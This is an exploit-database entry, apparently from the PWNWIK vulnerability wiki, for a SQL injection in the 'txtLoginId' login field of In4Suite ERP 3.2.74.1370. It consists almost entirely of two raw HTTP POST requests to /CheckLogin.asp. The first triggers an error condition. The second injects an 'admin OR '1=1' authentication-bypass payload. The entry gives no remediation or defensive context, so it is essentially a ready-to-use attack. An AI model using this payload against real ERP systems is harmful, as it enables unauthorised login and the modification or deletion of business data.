PWNWIK.COM
,
EXP
# Exploit Title: In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection # Date: 18/05/2021 # Exploit Author: Gulab Mondal # Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html # Version: In4Suite ERP 3.2.74.1370 # Tested on: Windows ----------------------------------------- SQL injection in In4Suite ERP 3.2.74.1370 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries. -------------- # Error condition POST /CheckLogin.asp HTTP/1.1 Host: 127.0.0.1 txtLoginId=admin&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" " # SQL Injection exploitation POST /CheckLogin.asp HTTP/1.1 Host: 127.0.0.1 txtLoginId=admin OR '1=1&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" ------------------------------
PWNWIK.COM==免费、自由、人人可编辑的漏洞库